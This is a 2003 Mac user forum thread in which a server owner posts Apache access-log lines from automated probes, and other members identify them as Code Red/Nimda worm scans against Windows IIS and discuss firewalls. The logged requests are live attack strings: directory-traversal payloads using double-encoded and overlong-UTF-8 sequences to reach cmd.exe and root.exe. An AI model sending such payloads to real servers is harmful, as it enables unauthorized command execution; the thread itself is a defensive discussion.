Help someone is trying to hack me!

elric · February 13, 2003 9:00AM

Someone is trying to hack into my webserver

I have their IP number, is there anyway to get their domain name from the ip number?

This is what is in my /var/local/httpd/access_log

4.64.145.80 - - [12/Feb/2003:23:30:14 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284

4.64.145.80 - - [12/Feb/2003:23:30:16 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282

4.64.145.80 - - [12/Feb/2003:23:30:18 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292

4.64.145.80 - - [12/Feb/2003:23:30:20 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292

4.64.145.80 - - [12/Feb/2003:23:30:23 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

4.64.145.80 - - [12/Feb/2003:23:30:25 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 40

4 323

4.64.145.80 - - [12/Feb/2003:23:30:28 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 40

4 323

4.64.145.80 - - [12/Feb/2003:23:30:30 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32

/cmd.exe?/c+dir HTTP/1.0" 404 339

4.64.145.80 - - [12/Feb/2003:23:30:33 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

4.64.145.80 - - [12/Feb/2003:23:30:35 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

4.64.145.80 - - [12/Feb/2003:23:30:38 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

4.64.145.80 - - [12/Feb/2003:23:30:40 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

4.64.145.80 - - [12/Feb/2003:23:30:42 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289

4.64.145.80 - - [12/Feb/2003:23:30:45 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289

4.64.145.80 - - [12/Feb/2003:23:30:47 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

4.64.145.80 - - [12/Feb/2003:23:30:49 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

4.64.145.80 - - [13/Feb/2003:02:34:14 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284

4.64.145.80 - - [13/Feb/2003:02:34:14 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282

4.64.145.80 - - [13/Feb/2003:02:34:15 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292

4.64.145.80 - - [13/Feb/2003:02:34:15 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292

4.64.145.80 - - [13/Feb/2003:02:34:15 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

4.64.145.80 - - [13/Feb/2003:02:34:16 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 40

4 323

4.64.145.80 - - [13/Feb/2003:02:34:16 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 40

4 323

4.64.145.80 - - [13/Feb/2003:02:34:16 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32

/cmd.exe?/c+dir HTTP/1.0" 404 339

4.64.145.80 - - [13/Feb/2003:02:34:17 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

4.64.145.80 - - [13/Feb/2003:02:34:17 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

4.64.145.80 - - [13/Feb/2003:02:34:17 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

4.64.145.80 - - [13/Feb/2003:02:34:18 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

4.64.145.80 - - [13/Feb/2003:02:34:18 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289

4.64.145.80 - - [13/Feb/2003:02:34:18 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289

4.64.145.80 - - [13/Feb/2003:02:34:19 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

4.64.145.80 - - [13/Feb/2003:02:34:19 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

4.64.145.80 - - [13/Feb/2003:05:14:06 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284

4.64.145.80 - - [13/Feb/2003:05:14:07 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282

4.64.145.80 - - [13/Feb/2003:05:14:07 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292

4.64.145.80 - - [13/Feb/2003:05:14:08 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292

4.64.145.80 - - [13/Feb/2003:05:14:08 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

4.64.145.80 - - [13/Feb/2003:05:14:09 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 40

4 323

4.64.145.80 - - [13/Feb/2003:05:14:09 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 40

4 323

4.64.145.80 - - [13/Feb/2003:05:14:10 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32

/cmd.exe?/c+dir HTTP/1.0" 404 339

4.64.145.80 - - [13/Feb/2003:05:14:10 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

4.64.145.80 - - [13/Feb/2003:05:14:10 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

4.64.145.80 - - [13/Feb/2003:05:14:11 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

4.64.145.80 - - [13/Feb/2003:05:14:11 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

4.64.145.80 - - [13/Feb/2003:05:14:12 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289

4.64.145.80 - - [13/Feb/2003:05:14:12 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289

4.64.145.80 - - [13/Feb/2003:05:14:13 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

4.64.145.80 - - [13/Feb/2003:05:14:13 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

4.64.145.80 - - [13/Feb/2003:05:23:40 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 284

4.64.145.80 - - [13/Feb/2003:05:23:41 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 282

4.64.145.80 - - [13/Feb/2003:05:23:41 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292

4.64.145.80 - - [13/Feb/2003:05:23:42 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292

4.64.145.80 - - [13/Feb/2003:05:23:42 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

4.64.145.80 - - [13/Feb/2003:05:23:43 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 40

4 323

4.64.145.80 - - [13/Feb/2003:05:23:43 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 40

4 323

4.64.145.80 - - [13/Feb/2003:05:23:44 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32

/cmd.exe?/c+dir HTTP/1.0" 404 339

4.64.145.80 - - [13/Feb/2003:05:23:45 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

4.64.145.80 - - [13/Feb/2003:05:23:45 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

4.64.145.80 - - [13/Feb/2003:05:23:46 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

4.64.145.80 - - [13/Feb/2003:05:23:46 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305

4.64.145.80 - - [13/Feb/2003:05:23:47 -0600] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289

4.64.145.80 - - [13/Feb/2003:05:23:48 -0600] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289

4.64.145.80 - - [13/Feb/2003:05:23:48 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

4.64.145.80 - - [13/Feb/2003:05:23:49 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306

the milkman · February 13, 2003 9:24AM

From <a href="http://remote.12dt.com/rns/"; target="_blank">here</a>.

[quote]IP Address 4.64.145.80 resolves to:

hnllhi1-ar2-4-64-145-080.hnllhi1.dsl-verizon.net <hr></blockquote>

elric · February 13, 2003 9:32AM

Thanks, I emailed security@verizon.net and got back a canned automated response <img src="graemlins/bugeye.gif" border="0" alt="[Skeptical]" /> Anyways now I know why my hd kept spinning up for seamingly no reason.

Does the built in firewall in os X 10.2.3 block all ports except the ones you allow? And does it generate any types of logs regarding attempts?

the milkman · February 13, 2003 10:48AM

[quote]Originally posted by Elric:

Does the built in firewall in os X 10.2.3 block all ports except the ones you allow? And does it generate any types of logs regarding attempts?<hr></blockquote>

Not sure on that one, haven't really played around with that yet. Also, I wouldn't be the least bit surprised if the person that owns the computer doesn't even know that their computer is doing this. It is trying to exploit a windows IIS server and looks like it is very automated (some sort of script or program). Your OS X server is pretty secure from any windows exploit. Funny, you'd think that the script kiddie/hacker/program/script would be at least smart enough to check what type of server they were connected to. <img src="graemlins/lol.gif" border="0" alt="[Laughing]" />

ghost_user_name · February 13, 2003 11:05AM

I think Milkman is right. It looks a lot like you were just hit by a script kiddie or by some no-name PC that's infected with a virus that tries hitting other random PCs in an automated like this (I remember reading about one that did this not long ago; I can't recall the name). I wouldn't be too worried about it.

If you want to enable the built-in firewall on Mac OS X, yes, you can have it block specific ports or specific IPs. I always recommend using the shareware app BrickHouse to configure the firewall. It has far superior control over the firewall's features than Apple's dumbed-down pane in the System Prefs. Of course, I'm assuming you are using regular Mac OS X; there may be better firewall controls in Mac OS X Server with which I am not familiar.

[ 02-13-2003: Message edited by: Brad ]

adpowers · February 13, 2003 11:46AM

Yeah, I agree with the others. I get these all the time on my Apache/Linux server. No need to worry unless you are running IIS/Windows (in which case you wouldn't be on this board

). Once an IIS server is infected, it starts sending out these requests to try and infect other servers. It is probably someone with an unpatched server.

fahlman · February 13, 2003 1:16PM

Hey! That's my IP address <img src="graemlins/lol.gif" border="0" alt="[Laughing]" /> Just kidding. Just a few numbers off though. People who have broadband should run firewalls and virus software.

ast3r3x · February 13, 2003 2:59PM

i'm on a PC, haha its probably me...i got norton cuz not joking after 3days i had 78 infected files...2 diff virus'

kenneth · February 13, 2003 3:23PM

You are not alone. I just check the log and got the same stuff as you did. Anyone knows what are those scripts do?

amorph · February 13, 2003 4:11PM

They're variously either trying to take control of the IIS server running on your Windows machine, or just own your Windows machine, to plant a virus, or use your machine to try to take over another Windows/IIS server, or to participate in a distributed denial of service, etc.

If you don't have a Windows machine, you can just point and laugh.

[ 02-13-2003: Message edited by: Amorph ]

noahj · February 13, 2003 6:00PM

I am getting the identical thing here. Different IP of course. Once again, glad I do not run Windows.

costique · February 14, 2003 2:21AM

These 'hackers' even don't bother to check the operating system. I can recall requests for C

\Windows\\*.* in my Apache logs.

pais · February 14, 2003 5:35PM

[quote]Originally posted by costique:

These 'hackers' even don't bother to check the operating system. I can recall requests for C

\Windows\\*.* in my Apache logs.<hr></blockquote>

This is the infamous CodeRed/Nimda IIS worm. I wouldn't worry about it.

Help someone is trying to hack me!

Comments